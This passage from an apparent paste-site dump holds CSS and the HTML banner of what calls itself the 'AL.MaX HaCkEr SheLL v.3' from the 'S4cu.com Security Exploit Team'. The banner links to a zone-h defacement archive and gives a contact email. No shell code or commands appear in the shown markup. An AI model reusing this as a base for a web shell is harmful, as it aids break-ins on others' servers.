  7288. width:100%;
  7289. background:#222;
  7290. }
  7291.  
  7292. * {
  7293. padding:0;
  7294. margin:0;
  7295. }
  7296.  
  7297. div.end *
  7298. {
  7299. font-size:small;
  7300. }
  7301.  
  7302. .style27 {
  7303. color: gray;
  7304. }
  7305. .style25 {
  7306. color: maroon;
  7307. }
  7308. .style31 {
  7309. color: #FF4D00;
  7310. }
  7311. .style32 {
  7312. color: #FF0000;
  7313. }
  7314. .style33 {
  7315. color: #006600;
  7316. }
  7317. .style34 {
  7318. margin-bottom: 0;
  7319. text-align: left;
  7320. }
  7321. .style35 {
  7322. border: 1px double #000000;
  7323. background-color: #000000;
  7324. text-align: left;
  7325. }
  7326. .style36 {
  7327. border-style: solid;
  7328. text-align: right;
  7329. }
  7330. .style37 {
  7331. text-align: right;
  7332. }
  7333. .style38 {
  7334. text-align: left;
  7335. }
  7336. .style39 {
  7337. width: 100%;
  7338. text-align: left;
  7339. }
  7340. .style40 {
  7341. margin-right: 556;
  7342. margin-bottom: 0;
  7343. }
  7344. .style41 {
  7345. color: #444444;
  7346. }
  7347. .style42 {
  7348. font-family: "Times New Roman", Times, serif;
  7349. font-size: xx-large;
  7350. }
  7351. .style43 {
  7352. text-align: center;
  7353. }
  7354. </style>
  7355. <title>S4cu.com Security Exploit Team</title>
  7356. </head>
  7357.  
  7358. <body style="background-color: #000000; color: #000000;">
  7359.  
  7360. <p class="style1">&nbsp;</p>
  7361.  
  7362. <div class="end">
  7363. <p align="center"><b>&nbsp;</b><br />
  7364. </p>
  7365. <table style="border: 2px solid rgb(218, 218, 218);" width="100%" bgcolor="#000000" height="%">
  7366. <tr>
  7367. <td><font color="grey">
  7368.  
  7369. <center><font color="white" face="tahoma" size="4"><b>
  7370. [
  7371. <span class="style27"> &nbsp;<font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma"><span <ul="" lang="en-us"><font color="white" face="tahoma" size="4"><span class="style41">Private
  7372. ! .. AL.MaX HaCkEr SheLL</span><span class="style25"><font color="Green"><font class="style26" color="gray" size="-2"><span class="style21"><strong>
  7373. <font color="white" face="tahoma" size="4">|</font> v.</strong>3</span></font></font></span></font>
  7374. - Copyright
  7375. / <font color="#FFFFFF" face="Tahoma">2013
  7376. <a style="text-decoration: none; " href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
  7377. <font color="#FFFFFF">AL.MaX HaCkEr </font></a></font></span>
  7378. <font color="#000000">
  7379. &nbsp;</font></font></span></font></span></font></span>&nbsp;]<span class="style27">
  7380. </span> <br>
  7381. <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma">&nbsp;
  7382. <font color="#000000">
  7383. <a style="text-decoration: none" href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
  7384. <font color="#808080" face="Tahoma">Zone-h</font></a><font color="red" size="5" face="tahoma"><font class="whiteglow" face="tahoma"><font color="#808080" face="Tahoma"> <img alt="" src="http://www.senojflags.com/images/national-flag-icons/Sudan-Flag.png" height="16" width="16"></font></font></font> </font></font>
  7385. </span></font></span></font> </span>
  7386. </b>
  7387. <strong class="style42">Gun@Linuxmail.Org</strong></font></center>
  7388. </font></td>
  7389. </tr>
  7390. </table>
  7391. <p align="center">&nbsp;</p>
  7392. </div>
  7393. <p class="style1">&nbsp;</p>
Add Comment
Please, Sign In to add comment